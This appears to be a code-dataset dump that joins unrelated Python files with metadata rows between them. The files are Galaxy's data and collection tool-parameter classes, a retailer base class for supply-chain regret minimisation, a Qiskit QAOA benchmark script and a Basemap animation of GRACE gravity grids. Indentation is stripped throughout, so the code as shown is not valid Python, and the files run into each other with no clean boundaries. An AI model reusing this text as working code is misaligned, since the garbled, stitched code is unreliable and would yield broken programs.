src = 'hda'
if src is not None:
object_id = galaxy.model.cached_id(value)
return {'id': app.security.encode_id(object_id) if use_security else object_id, 'src': src}
if value not in [None, '', 'None']:
if isinstance(value, list) and len(value) > 0:
values = [single_to_json(v) for v in value]
else:
values = [single_to_json(value)]
return {'values': values}
return None
def to_python(self, value, app):
def single_to_python(value):
if isinstance(value, dict) and 'src' in value:
id = value['id'] if isinstance(value['id'], int) else app.security.decode_id(value['id'])
if value['src'] == 'dce':
return app.model.context.query(app.model.DatasetCollectionElement).get(id)
elif value['src'] == 'hdca':
return app.model.context.query(app.model.HistoryDatasetCollectionAssociation).get(id)
elif value['src'] == 'ldda':
return app.model.context.query(app.model.LibraryDatasetDatasetAssociation).get(id)
else:
return app.model.context.query(app.model.HistoryDatasetAssociation).get(id)
if isinstance(value, dict) and 'values' in value:
if hasattr(self, 'multiple') and self.multiple is True:
return [single_to_python(v) for v in value['values']]
elif len(value['values']) > 0:
return single_to_python(value['values'][0])
# Handle legacy string values potentially stored in databases
none_values = [None, '', 'None']
if value in none_values:
return None
if isinstance(value, str) and value.find(',') > -1:
return [app.model.context.query(app.model.HistoryDatasetAssociation).get(int(v)) for v in value.split(',') if v not in none_values]
elif str(value).startswith("__collection_reduce__|"):
decoded_id = str(value)[len("__collection_reduce__|"):]
if not decoded_id.isdigit():
decoded_id = app.security.decode_id(decoded_id)
return app.model.context.query(app.model.HistoryDatasetCollectionAssociation).get(int(decoded_id))
elif str(value).startswith("dce:"):
return app.model.context.query(app.model.DatasetCollectionElement).get(int(value[len("dce:"):]))
elif str(value).startswith("hdca:"):
return app.model.context.query(app.model.HistoryDatasetCollectionAssociation).get(int(value[len("hdca:"):]))
else:
return app.model.context.query(app.model.HistoryDatasetAssociation).get(int(value))
def validate(self, value, trans=None):
def do_validate(v):
for validator in self.validators:
if validator.requires_dataset_metadata and v and hasattr(v, 'dataset') and v.dataset.state != galaxy.model.Dataset.states.OK:
return
else:
validator.validate(v, trans)
dataset_count = 0
if value:
if self.multiple:
if not isinstance(value, list):
value = [value]
else:
value = [value]
for v in value:
if isinstance(v, galaxy.model.HistoryDatasetCollectionAssociation):
for dataset_instance in v.collection.dataset_instances:
dataset_count += 1
do_validate(dataset_instance)
elif isinstance(v, galaxy.model.DatasetCollectionElement):
for dataset_instance in v.child_collection.dataset_instances:
dataset_count += 1
do_validate(dataset_instance)
else:
dataset_count += 1
do_validate(v)
if self.min is not None:
if self.min > dataset_count:
raise ValueError("At least %d datasets are required for %s" % (self.min, self.name))
if self.max is not None:
if self.max < dataset_count:
raise ValueError("At most %d datasets are required for %s" % (self.max, self.name))
class DataToolParameter(BaseDataToolParameter):
# TODO, Nate: Make sure the following unit tests appropriately test the dataset security
# components. Add as many additional tests as necessary.
"""
    Parameter that takes on one (or many) of a specific set of values.
TODO: There should be an alternate display that allows single selects to be
displayed as radio buttons and multiple selects as a set of checkboxes
TODO: The following must be fixed to test correctly for the new security_check tag in
the DataToolParameter (the last test below is broken) Nate's next pass at the dataset
security stuff will dramatically alter this anyway.
"""
def __init__(self, tool, input_source, trans=None):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source, trans)
self.load_contents = int(input_source.get("load_contents", 0))
# Add metadata validator
if not input_source.get_bool('no_validation', False):
self.validators.append(validation.MetadataValidator())
self._parse_formats(trans, input_source)
self.multiple = input_source.get_bool('multiple', False)
if not self.multiple and (self.min is not None):
raise ParameterValueError("cannot specify 'min' property on single data parameter. Set multiple=\"true\" to enable this option", self.name)
if not self.multiple and (self.max is not None):
raise ParameterValueError("cannot specify 'max' property on single data parameter. Set multiple=\"true\" to enable this option", self.name)
self.is_dynamic = True
self._parse_options(input_source)
# Load conversions required for the dataset input
self.conversions = []
for name, conv_extension in input_source.parse_conversion_tuples():
assert None not in [name, conv_extension], f'A name ({name}) and type ({conv_extension}) are required for explicit conversion'
if self.datatypes_registry:
conv_type = self.datatypes_registry.get_datatype_by_extension(conv_extension.lower())
if conv_type is None:
raise ParameterValueError(f"datatype class not found for extension '{conv_type}', which is used as 'type' attribute in conversion of data parameter", self.name)
self.conversions.append((name, conv_extension, [conv_type]))
def from_json(self, value, trans, other_values=None):
other_values = other_values or {}
if trans.workflow_building_mode is workflow_building_modes.ENABLED or is_runtime_value(value):
return None
if not value and not self.optional:
raise ParameterValueError("specify a dataset of the required format / build for parameter", self.name)
if value in [None, "None", '']:
return None
if isinstance(value, dict) and 'values' in value:
value = self.to_python(value, trans.app)
if isinstance(value, str) and value.find(",") > 0:
value = [int(value_part) for value_part in value.split(",")]
if isinstance(value, list):
rval = []
found_hdca = False
for single_value in value:
if isinstance(single_value, dict) and 'src' in single_value and 'id' in single_value:
if single_value['src'] == 'hda':
decoded_id = trans.security.decode_id(single_value['id'])
rval.append(trans.sa_session.query(trans.app.model.HistoryDatasetAssociation).get(decoded_id))
elif single_value['src'] == 'hdca':
found_hdca = True
decoded_id = trans.security.decode_id(single_value['id'])
rval.append(trans.sa_session.query(trans.app.model.HistoryDatasetCollectionAssociation).get(decoded_id))
elif single_value['src'] == 'ldda':
decoded_id = trans.security.decode_id(single_value['id'])
rval.append(trans.sa_session.query(trans.app.model.LibraryDatasetDatasetAssociation).get(decoded_id))
else:
raise ValueError(f"Unknown input source {single_value['src']} passed to job submission API.")
elif isinstance(single_value, trans.app.model.HistoryDatasetCollectionAssociation):
rval.append(single_value)
elif isinstance(single_value, trans.app.model.DatasetCollectionElement):
rval.append(single_value)
elif isinstance(single_value, trans.app.model.HistoryDatasetAssociation):
rval.append(single_value)
elif isinstance(single_value, trans.app.model.LibraryDatasetDatasetAssociation):
rval.append(single_value)
else:
if len(str(single_value)) == 16:
# Could never really have an ID this big anyway - postgres doesn't
# support that for integer column types.
log.warning("Encoded ID where unencoded ID expected.")
single_value = trans.security.decode_id(single_value)
rval.append(trans.sa_session.query(trans.app.model.HistoryDatasetAssociation).get(single_value))
if found_hdca:
for val in rval:
if not isinstance(val, trans.app.model.HistoryDatasetCollectionAssociation):
raise ParameterValueError("if collections are supplied to multiple data input parameter, only collections may be used", self.name)
elif isinstance(value, trans.app.model.HistoryDatasetAssociation):
rval = value
elif isinstance(value, dict) and 'src' in value and 'id' in value:
if value['src'] == 'hda':
decoded_id = trans.security.decode_id(value['id'])
rval = trans.sa_session.query(trans.app.model.HistoryDatasetAssociation).get(decoded_id)
elif value['src'] == 'hdca':
decoded_id = trans.security.decode_id(value['id'])
rval = trans.sa_session.query(trans.app.model.HistoryDatasetCollectionAssociation).get(decoded_id)
else:
raise ValueError(f"Unknown input source {value['src']} passed to job submission API.")
elif str(value).startswith("__collection_reduce__|"):
encoded_ids = [v[len("__collection_reduce__|"):] for v in str(value).split(",")]
decoded_ids = map(trans.security.decode_id, encoded_ids)
rval = []
for decoded_id in decoded_ids:
hdca = trans.sa_session.query(trans.app.model.HistoryDatasetCollectionAssociation).get(decoded_id)
rval.append(hdca)
elif isinstance(value, trans.app.model.HistoryDatasetCollectionAssociation) or isinstance(value, trans.app.model.DatasetCollectionElement):
rval = value
else:
rval = trans.sa_session.query(trans.app.model.HistoryDatasetAssociation).get(value)
values = util.listify(rval)
dataset_matcher_factory = get_dataset_matcher_factory(trans)
dataset_matcher = dataset_matcher_factory.dataset_matcher(self, other_values)
for v in values:
if v:
if hasattr(v, "deleted") and v.deleted:
raise ParameterValueError("the previously selected dataset has been deleted.", self.name)
elif hasattr(v, "dataset") and v.dataset.state in [galaxy.model.Dataset.states.ERROR, galaxy.model.Dataset.states.DISCARDED]:
raise ParameterValueError("the previously selected dataset has entered an unusable state", self.name)
elif hasattr(v, "dataset"):
match = dataset_matcher.hda_match(v)
if match and match.implicit_conversion:
v.implicit_conversion = True
if not self.multiple:
if len(values) > 1:
raise ParameterValueError("more than one dataset supplied to single input dataset parameter", self.name)
if len(values) > 0:
rval = values[0]
else:
raise ParameterValueError("invalid dataset supplied to single input dataset parameter", self.name)
return rval
def to_param_dict_string(self, value, other_values=None):
if value is None:
return "None"
return value.file_name
def to_text(self, value):
if value and not isinstance(value, list):
value = [value]
if value:
try:
return ", ".join(f"{item.hid}: {item.name}" for item in value)
except Exception:
pass
return "No dataset."
def get_dependencies(self):
"""
Get the *names* of the other params this param depends on.
"""
if self.options:
return self.options.get_dependency_names()
else:
return []
def converter_safe(self, other_values, trans):
if self.tool is None or self.tool.has_multiple_pages or not hasattr(trans, 'workflow_building_mode') or trans.workflow_building_mode:
return False
if other_values is None:
return True # we don't know other values, so we can't check, assume ok
converter_safe = [True]
def visitor(prefix, input, value, parent=None):
if isinstance(input, SelectToolParameter) and self.name in input.get_dependencies():
if input.is_dynamic and (input.dynamic_options or (not input.dynamic_options and not input.options) or not input.options.converter_safe):
converter_safe[0] = False # This option does not allow for conversion, i.e. uses contents of dataset file to generate options
self.tool.visit_inputs(other_values, visitor)
return False not in converter_safe
def get_options_filter_attribute(self, value):
# HACK to get around current hardcoded limitation of when a set of dynamic options is defined for a DataToolParameter
# it always causes available datasets to be filtered by dbkey
# this behavior needs to be entirely reworked (in a backwards compatible manner)
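        # Illustrative examples only (the attribute values are assumptions): an
        # options_filter_attribute of "metadata.dbkey" resolves to value.metadata.dbkey,
        # a trailing "()" such as "get_dbkey()" calls the resolved attribute, and with
        # nothing configured value.get_dbkey() is returned directly.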
options_filter_attribute = self.options_filter_attribute
if options_filter_attribute is None:
return value.get_dbkey()
if options_filter_attribute.endswith("()"):
call_attribute = True
options_filter_attribute = options_filter_attribute[:-2]
else:
call_attribute = False
ref = value
for attribute in options_filter_attribute.split('.'):
ref = getattr(ref, attribute)
if call_attribute:
ref = ref()
return str(ref)
def to_dict(self, trans, other_values=None):
other_values = other_values or {}
# create dictionary and fill default parameters
d = super().to_dict(trans)
extensions = self.extensions
all_edam_formats = self.datatypes_registry.edam_formats if hasattr(self.datatypes_registry, 'edam_formats') else {}
all_edam_data = self.datatypes_registry.edam_data if hasattr(self.datatypes_registry, 'edam_formats') else {}
edam_formats = [all_edam_formats.get(ext, None) for ext in extensions]
edam_data = [all_edam_data.get(ext, None) for ext in extensions]
d['extensions'] = extensions
d['edam'] = {'edam_formats': edam_formats, 'edam_data': edam_data}
d['multiple'] = self.multiple
if self.multiple:
# For consistency, should these just always be in the dict?
d['min'] = self.min
d['max'] = self.max
d['options'] = {'hda': [], 'hdca': []}
# return dictionary without options if context is unavailable
history = trans.history
if history is None or trans.workflow_building_mode is workflow_building_modes.ENABLED:
return d
# prepare dataset/collection matching
dataset_matcher_factory = get_dataset_matcher_factory(trans)
dataset_matcher = dataset_matcher_factory.dataset_matcher(self, other_values)
multiple = self.multiple
# build and append a new select option
def append(list, hda, name, src, keep=False, subcollection_type=None):
value = {
'id': trans.security.encode_id(hda.id),
'hid': hda.hid if hda.hid is not None else -1,
'name': name,
'tags': [t.user_tname if not t.value else f"{t.user_tname}:{t.value}" for t in hda.tags],
'src': src,
'keep': keep
}
if subcollection_type:
value["map_over_type"] = subcollection_type
return list.append(value)
# add datasets
hda_list = util.listify(other_values.get(self.name))
# Prefetch all at once, big list of visible, non-deleted datasets.
for hda in history.active_visible_datasets_and_roles:
match = dataset_matcher.hda_match(hda)
if match:
m = match.hda
hda_list = [h for h in hda_list if h != m and h != hda]
m_name = f'{match.original_hda.name} (as {match.target_ext})' if match.implicit_conversion else m.name
append(d['options']['hda'], m, m_name, 'hda')
for hda in hda_list:
if hasattr(hda, 'hid'):
if hda.deleted:
hda_state = 'deleted'
elif not hda.visible:
hda_state = 'hidden'
else:
hda_state = 'unavailable'
append(d['options']['hda'], hda, f'({hda_state}) {hda.name}', 'hda', True)
# add dataset collections
dataset_collection_matcher = dataset_matcher_factory.dataset_collection_matcher(dataset_matcher)
for hdca in history.active_visible_dataset_collections:
match = dataset_collection_matcher.hdca_match(hdca)
if match:
subcollection_type = None
if multiple and hdca.collection.collection_type != 'list':
collection_type_description = self._history_query(trans).can_map_over(hdca)
if collection_type_description:
subcollection_type = collection_type_description.collection_type
else:
continue
name = hdca.name
if match.implicit_conversion:
name = f"{name} (with implicit datatype conversion)"
append(d['options']['hdca'], hdca, name, 'hdca', subcollection_type=subcollection_type)
continue
# sort both lists
d['options']['hda'] = sorted(d['options']['hda'], key=lambda k: k['hid'], reverse=True)
d['options']['hdca'] = sorted(d['options']['hdca'], key=lambda k: k['hid'], reverse=True)
# return final dictionary
return d
def _history_query(self, trans):
assert self.multiple
dataset_collection_type_descriptions = trans.app.dataset_collection_manager.collection_type_descriptions
# If multiple data parameter, treat like a list parameter.
return history_query.HistoryQuery.from_collection_type("list", dataset_collection_type_descriptions)
class DataCollectionToolParameter(BaseDataToolParameter):
"""
"""
def __init__(self, tool, input_source, trans=None):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source, trans)
self._parse_formats(trans, input_source)
collection_types = input_source.get("collection_type", None)
if collection_types:
collection_types = [t.strip() for t in collection_types.split(",")]
self._collection_types = collection_types
        self.multiple = False  # Accessed on DataToolParameter a lot; may want to support multiple collections here in the future
self.is_dynamic = True
self._parse_options(input_source) # TODO: Review and test.
@property
def collection_types(self):
return self._collection_types
def _history_query(self, trans):
dataset_collection_type_descriptions = trans.app.dataset_collection_manager.collection_type_descriptions
return history_query.HistoryQuery.from_parameter(self, dataset_collection_type_descriptions)
def match_collections(self, trans, history, dataset_collection_matcher):
dataset_collections = trans.app.dataset_collection_manager.history_dataset_collections(history, self._history_query(trans))
for dataset_collection_instance in dataset_collections:
match = dataset_collection_matcher.hdca_match(dataset_collection_instance)
if not match:
continue
yield dataset_collection_instance, match.implicit_conversion
def match_multirun_collections(self, trans, history, dataset_collection_matcher):
for history_dataset_collection in history.active_visible_dataset_collections:
if not self._history_query(trans).can_map_over(history_dataset_collection):
continue
match = dataset_collection_matcher.hdca_match(history_dataset_collection)
if match:
yield history_dataset_collection, match.implicit_conversion
def from_json(self, value, trans, other_values=None):
other_values = other_values or {}
rval = None
if trans.workflow_building_mode is workflow_building_modes.ENABLED:
return None
if not value and not self.optional:
raise ParameterValueError("specify a dataset collection of the correct type", self.name)
if value in [None, "None"]:
return None
if isinstance(value, dict) and 'values' in value:
value = self.to_python(value, trans.app)
if isinstance(value, str) and value.find(",") > 0:
value = [int(value_part) for value_part in value.split(",")]
elif isinstance(value, trans.app.model.HistoryDatasetCollectionAssociation):
rval = value
elif isinstance(value, trans.app.model.DatasetCollectionElement):
            # When mapping over a nested collection, this parameter will receive
# a DatasetCollectionElement instead of a
# HistoryDatasetCollectionAssociation.
rval = value
elif isinstance(value, dict) and 'src' in value and 'id' in value:
if value['src'] == 'hdca':
rval = trans.sa_session.query(trans.app.model.HistoryDatasetCollectionAssociation).get(trans.security.decode_id(value['id']))
elif isinstance(value, list):
if len(value) > 0:
value = value[0]
if isinstance(value, dict) and 'src' in value and 'id' in value:
if value['src'] == 'hdca':
rval = trans.sa_session.query(trans.app.model.HistoryDatasetCollectionAssociation).get(trans.security.decode_id(value['id']))
elif value['src'] == 'dce':
rval = trans.sa_session.query(trans.app.model.DatasetCollectionElement).get(trans.security.decode_id(value['id']))
elif isinstance(value, str):
if value.startswith("dce:"):
rval = trans.sa_session.query(trans.app.model.DatasetCollectionElement).get(value[len("dce:"):])
elif value.startswith("hdca:"):
rval = trans.sa_session.query(trans.app.model.HistoryDatasetCollectionAssociation).get(value[len("hdca:"):])
else:
rval = trans.sa_session.query(trans.app.model.HistoryDatasetCollectionAssociation).get(value)
if rval and isinstance(rval, trans.app.model.HistoryDatasetCollectionAssociation):
if rval.deleted:
raise ParameterValueError("the previously selected dataset collection has been deleted", self.name)
# TODO: Handle error states, implement error states ...
return rval
def to_text(self, value):
try:
if isinstance(value, galaxy.model.HistoryDatasetCollectionAssociation):
display_text = f"{value.hid}: {value.name}"
else:
display_text = "Element %d:%s" % (value.identifier_index, value.identifier_name)
except AttributeError:
display_text = "No dataset collection."
return display_text
def to_dict(self, trans, other_values=None):
# create dictionary and fill default parameters
other_values = other_values or {}
d = super().to_dict(trans)
d['extensions'] = self.extensions
d['multiple'] = self.multiple
d['options'] = {'hda': [], 'hdca': [], 'dce': []}
# return dictionary without options if context is unavailable
history = trans.history
if history is None or trans.workflow_building_mode is workflow_building_modes.ENABLED:
return d
# prepare dataset/collection matching
dataset_matcher_factory = get_dataset_matcher_factory(trans)
dataset_matcher = dataset_matcher_factory.dataset_matcher(self, other_values)
dataset_collection_matcher = dataset_matcher_factory.dataset_collection_matcher(dataset_matcher)
# append DCE
if isinstance(other_values.get(self.name), galaxy.model.DatasetCollectionElement):
dce = other_values[self.name]
d['options']['dce'].append({
'id': trans.security.encode_id(dce.id),
'hid': None,
'name': dce.element_identifier,
'src': 'dce',
'tags': []
})
# append directly matched collections
for hdca, implicit_conversion in self.match_collections(trans, history, dataset_collection_matcher):
name = hdca.name
if implicit_conversion:
name = f"{name} (with implicit datatype conversion)"
d['options']['hdca'].append({
'id': trans.security.encode_id(hdca.id),
'hid': hdca.hid,
'name': name,
'src': 'hdca',
'tags': [t.user_tname if not t.value else f"{t.user_tname}:{t.value}" for t in hdca.tags]
})
# append matching subcollections
for hdca, implicit_conversion in self.match_multirun_collections(trans, history, dataset_collection_matcher):
subcollection_type = self._history_query(trans).can_map_over(hdca).collection_type
name = hdca.name
if implicit_conversion:
name = f"{name} (with implicit datatype conversion)"
d['options']['hdca'].append({
'id': trans.security.encode_id(hdca.id),
'hid': hdca.hid,
'name': name,
'src': 'hdca',
'tags': [t.user_tname if not t.value else f"{t.user_tname}:{t.value}" for t in hdca.tags],
'map_over_type': subcollection_type
})
# sort both lists
d['options']['hdca'] = sorted(d['options']['hdca'], key=lambda k: k['hid'], reverse=True)
# return final dictionary
return d
class HiddenDataToolParameter(HiddenToolParameter, DataToolParameter):
"""
Hidden parameter that behaves as a DataToolParameter. As with all hidden
parameters, this is a HACK.
"""
def __init__(self, tool, elem):
DataToolParameter.__init__(self, tool, elem)
self.value = "None"
self.type = "hidden_data"
self.hidden = True
class LibraryDatasetToolParameter(ToolParameter):
"""
Parameter that lets users select a LDDA from a modal window, then use it within the wrapper.
"""
def __init__(self, tool, input_source, context=None):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source)
self.multiple = input_source.get_bool('multiple', True)
def from_json(self, value, trans, other_values=None):
other_values = other_values or {}
return self.to_python(value, trans.app, other_values=other_values, validate=True)
def to_param_dict_string(self, value, other_values=None):
if value is None:
return 'None'
elif self.multiple:
return [dataset.get_file_name() for dataset in value]
else:
return value[0].get_file_name()
# converts values to json representation:
    # { id: LibraryDatasetDatasetAssociation.id, name: LibraryDatasetDatasetAssociation.name, src: 'ldda' }
def to_json(self, value, app, use_security):
if not isinstance(value, list):
value = [value]
lst = []
for item in value:
lda_id = lda_name = None
if isinstance(item, app.model.LibraryDatasetDatasetAssociation):
lda_id = app.security.encode_id(item.id) if use_security else item.id
lda_name = item.name
elif isinstance(item, dict):
lda_id = item.get('id')
lda_name = item.get('name')
else:
lst = []
break
if lda_id is not None:
lst.append({
'id': lda_id,
'name': lda_name,
'src': 'ldda'
})
if len(lst) == 0:
return None
else:
return lst
# converts values into python representation:
# LibraryDatasetDatasetAssociation
# valid input values (incl. arrays of mixed sets) are:
# 1. LibraryDatasetDatasetAssociation
# 2. LibraryDatasetDatasetAssociation.id
# 3. { id: LibraryDatasetDatasetAssociation.id, ... }
def to_python(self, value, app, other_values=None, validate=False):
other_values = other_values or {}
if not isinstance(value, list):
value = [value]
lst = []
for item in value:
if isinstance(item, app.model.LibraryDatasetDatasetAssociation):
lst.append(item)
else:
lda_id = None
if isinstance(item, dict):
lda_id = item.get('id')
elif isinstance(item, str):
lda_id = item
else:
lst = []
break
lda = app.model.context.query(app.model.LibraryDatasetDatasetAssociation).get(lda_id if isinstance(lda_id, int) else app.security.decode_id(lda_id))
if lda is not None:
lst.append(lda)
elif validate:
raise ParameterValueError("one of the selected library datasets is invalid or not available anymore", self.name)
if len(lst) == 0:
if not self.optional and validate:
raise ParameterValueError("invalid library dataset selected", self.name)
return None
else:
return lst
def to_dict(self, trans, other_values=None):
d = super().to_dict(trans)
d['multiple'] = self.multiple
return d
class BaseJsonToolParameter(ToolParameter):
"""
Class of parameter that tries to keep values as close to JSON as possible.
In particular value_to_basic is overloaded to prevent params_to_strings from
double encoding JSON and to_python using loads to produce values.
"""
def value_to_basic(self, value, app, use_security=False):
if is_runtime_value(value):
return runtime_to_json(value)
return value
def to_json(self, value, app, use_security):
"""Convert a value to a string representation suitable for persisting"""
return json.dumps(value)
def to_python(self, value, app):
"""Convert a value created with to_json back to an object representation"""
return json.loads(value)
class DirectoryUriToolParameter(SimpleTextToolParameter):
"""galaxy.files URIs for directories."""
def __init__(self, tool, input_source, context=None):
input_source = ensure_input_source(input_source)
SimpleTextToolParameter.__init__(self, tool, input_source)
class RulesListToolParameter(BaseJsonToolParameter):
"""
Parameter that allows for the creation of a list of rules using the Galaxy rules DSL.
"""
def __init__(self, tool, input_source, context=None):
input_source = ensure_input_source(input_source)
BaseJsonToolParameter.__init__(self, tool, input_source)
self.data_ref = input_source.get("data_ref", None)
def to_dict(self, trans, other_values=None):
other_values = other_values or {}
d = ToolParameter.to_dict(self, trans)
target_name = self.data_ref
if target_name in other_values:
target = other_values[target_name]
if not is_runtime_value(target):
d["target"] = {
"src": "hdca" if hasattr(target, "collection") else "hda",
"id": trans.app.security.encode_id(target.id),
}
return d
def validate(self, value, trans=None):
super().validate(value, trans=trans)
if not isinstance(value, dict):
raise ValueError("No rules specified for rules parameter.")
if "rules" not in value:
raise ValueError("No rules specified for rules parameter")
mappings = value.get("mapping", None)
if not mappings:
raise ValueError("No column definitions defined for rules parameter.")
def to_text(self, value):
if value:
rule_set = RuleSet(value)
return rule_set.display
else:
return ""
parameter_types = dict(
text=TextToolParameter,
integer=IntegerToolParameter,
float=FloatToolParameter,
boolean=BooleanToolParameter,
genomebuild=GenomeBuildParameter,
select=SelectToolParameter,
color=ColorToolParameter,
group_tag=SelectTagParameter,
data_column=ColumnListParameter,
hidden=HiddenToolParameter,
hidden_data=HiddenDataToolParameter,
baseurl=BaseURLToolParameter,
file=FileToolParameter,
ftpfile=FTPFileToolParameter,
data=DataToolParameter,
data_collection=DataCollectionToolParameter,
library_data=LibraryDatasetToolParameter,
rules=RulesListToolParameter,
directory_uri=DirectoryUriToolParameter,
drill_down=DrillDownSelectToolParameter
)
def runtime_to_json(runtime_value):
if isinstance(runtime_value, ConnectedValue) or (isinstance(runtime_value, dict) and runtime_value["__class__"] == "ConnectedValue"):
return {"__class__": "ConnectedValue"}
else:
return {"__class__": "RuntimeValue"}
def runtime_to_object(runtime_value):
if isinstance(runtime_value, ConnectedValue) or (isinstance(runtime_value, dict) and runtime_value["__class__"] == "ConnectedValue"):
return ConnectedValue()
else:
return RuntimeValue()
class RuntimeValue:
"""
Wrapper to note a value that is not yet set, but will be required at runtime.
"""
class ConnectedValue(RuntimeValue):
"""
Wrapper to note a value that is not yet set, but will be inferred from a connection.
"""
| 44.323741
| 395
| 0.615394
|
d85bbe9c8d40d8069c1ab882b9b2bbd0d971ca36
| 1,516
|
py
|
Python
|
scregmin/retailer/base.py
|
IBM/supply-chain-regret-minimization
|
2f08612e0e7d91a3b890cc5e4f4ee6f2df36fe97
|
[
"Apache-2.0"
] | 1
|
2021-09-23T10:14:37.000Z
|
2021-09-23T10:14:37.000Z
|
scregmin/retailer/base.py
|
IBM/supply-chain-regret-minimization
|
2f08612e0e7d91a3b890cc5e4f4ee6f2df36fe97
|
[
"Apache-2.0"
] | null | null | null |
scregmin/retailer/base.py
|
IBM/supply-chain-regret-minimization
|
2f08612e0e7d91a3b890cc5e4f4ee6f2df36fe97
|
[
"Apache-2.0"
] | 1
|
2022-02-16T17:58:49.000Z
|
2022-02-16T17:58:49.000Z
|
#
# Copyright 2020- IBM Inc. All rights reserved
# SPDX-License-Identifier: Apache2.0
#
from typing import Tuple, Optional, Dict, Union
import numpy as np
from collections import defaultdict
from abc import ABC, abstractmethod
class BaseRetailer(ABC):
def __init__(self, seed: Optional[int] = None):
if seed is None:
seed = sum([ord(s) for s in "retailer"])
self.seed = seed
self.reset_rng()
def reset_rng(self, seed: Optional[int] = None):
if seed is None:
self.rng = np.random.RandomState(self.seed)
else:
self.rng = np.random.RandomState(seed)
@abstractmethod
def act(self, wholesale_price: float) -> Tuple[float, float]:
raise NotImplementedError
@abstractmethod
def learn(self, demand: float):
raise NotImplementedError
class RandomRetailer(BaseRetailer):
def act(self, wholesale_price: float) -> Tuple[float, float]:
retail_price, quantity = self.rng.random(2)
return retail_price, quantity
def learn(self, demand: float):
pass
class ConstantRetailer(BaseRetailer):
def __init__(self,
retail_price: float,
quantity: float,
seed: Optional[int] = None):
        super().__init__(seed)
        self.retail_price = retail_price
        self.quantity = quantity
def act(self, wholesale_price: float) -> Tuple[float, float]:
return self.retail_price, self.quantity
def learn(self, demand: float):
pass
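# Illustrative use of the interface above (hypothetical price and demand values,
# not part of the original module):
#
#     retailer = RandomRetailer(seed=0)
#     price, quantity = retailer.act(wholesale_price=0.3)
#     retailer.learn(demand=0.7)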
| 24.852459
| 65
| 0.639182
|
3d9ba78eba20c481aaccce0f67f932ba987e72ad
| 2,471
|
py
|
Python
|
data/p4VQE/R1/benchmark/startQiskit_Class174.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p4VQE/R1/benchmark/startQiskit_Class174.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p4VQE/R1/benchmark/startQiskit_Class174.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
# qubit number=3
# total number=12
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
import networkx as nx
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def make_circuit(n:int) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
prog = QuantumCircuit(input_qubit)
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
for edge in E:
k = edge[0]
l = edge[1]
prog.cp(-2 * gamma, input_qubit[k-1], input_qubit[l-1])
prog.p(gamma, k)
prog.p(gamma, l)
prog.rx(2 * beta, range(len(V)))
prog.cx(input_qubit[1],input_qubit[0]) # number=9
prog.x(input_qubit[0]) # number=10
prog.cx(input_qubit[1],input_qubit[0]) # number=11
prog.x(input_qubit[0]) # number=6
prog.y(input_qubit[2]) # number=7
prog.y(input_qubit[2]) # number=8
# circuit end
return prog
if __name__ == '__main__':
n = 4
V = np.arange(0, n, 1)
E = [(0, 1, 1.0), (0, 2, 1.0), (1, 2, 1.0), (3, 2, 1.0), (3, 1, 1.0)]
G = nx.Graph()
G.add_nodes_from(V)
G.add_weighted_edges_from(E)
step_size = 0.1
a_gamma = np.arange(0, np.pi, step_size)
a_beta = np.arange(0, np.pi, step_size)
a_gamma, a_beta = np.meshgrid(a_gamma, a_beta)
F1 = 3 - (np.sin(2 * a_beta) ** 2 * np.sin(2 * a_gamma) ** 2 - 0.5 * np.sin(4 * a_beta) * np.sin(4 * a_gamma)) * (
1 + np.cos(4 * a_gamma) ** 2)
result = np.where(F1 == np.amax(F1))
a = list(zip(result[0], result[1]))[0]
gamma = a[0] * step_size
beta = a[1] * step_size
prog = make_circuit(4)
sample_shot =5200
writefile = open("../data/startQiskit_Class174.csv", "w")
# prog.draw('mpl', filename=(kernel + '.png'))
backend = BasicAer.get_backend('statevector_simulator')
circuit1 = transpile(prog, FakeYorktown())
prog = circuit1
info = execute(prog,backend=backend, shots=sample_shot).result().get_counts()
print(info, file=writefile)
print("results end", file=writefile)
print(circuit1.depth(), file=writefile)
print(circuit1, file=writefile)
writefile.close()
| 27.455556
| 118
| 0.634156
|
f58c129056a76d53deabe73b877cc2532ca0c924
| 886
|
py
|
Python
|
Code/animate.py
|
AndreasMadsen/grace
|
bf472d30a2fac76145d3f68e819c92da4a1970ba
|
[
"MIT"
] | 1
|
2016-05-17T22:52:19.000Z
|
2016-05-17T22:52:19.000Z
|
Code/animate.py
|
AndreasMadsen/grace
|
bf472d30a2fac76145d3f68e819c92da4a1970ba
|
[
"MIT"
] | null | null | null |
Code/animate.py
|
AndreasMadsen/grace
|
bf472d30a2fac76145d3f68e819c92da4a1970ba
|
[
"MIT"
] | null | null | null |
import grace
import math
import numpy as np
import matplotlib.pyplot as plt
import mpl_toolkits.basemap as maps
import matplotlib.animation as animation
fig = plt.figure(figsize=(12, 6))
m = maps.Basemap(projection='cyl', lon_0=0, resolution='c')
m.drawcoastlines(linewidth=.5)
m.drawparallels(np.arange(-90.,120.,30.),labels=[1,0,0,0])
m.drawmeridians(np.arange(0.,420.,60.),labels=[0,0,0,1])
print(math.ceil(np.max(grace.grids)), math.floor(np.min(grace.grids)))
im = m.imshow(grace.grids[::-1,:,0], vmax=math.ceil(np.max(grace.grids)), vmin=math.floor(np.min(grace.grids)))
im.set_cmap('binary_r')
print(grace.grids[::-1, :, :].shape)
def updatefig(period):
im.set_data(grace.grids[::-1,:,period])
plt.title(str(grace.dates[period, 0]))
ani = animation.FuncAnimation(fig, updatefig, frames=grace.grids.shape[2], interval=20, blit=False, repeat=False)
m.colorbar()
plt.show()
| 27.6875
| 113
| 0.723476
|
baa430bccc5fe73199ceed34047fa6bd35b984a6
| 15,296
|
py
|
Python
|
SimulationRunner.py
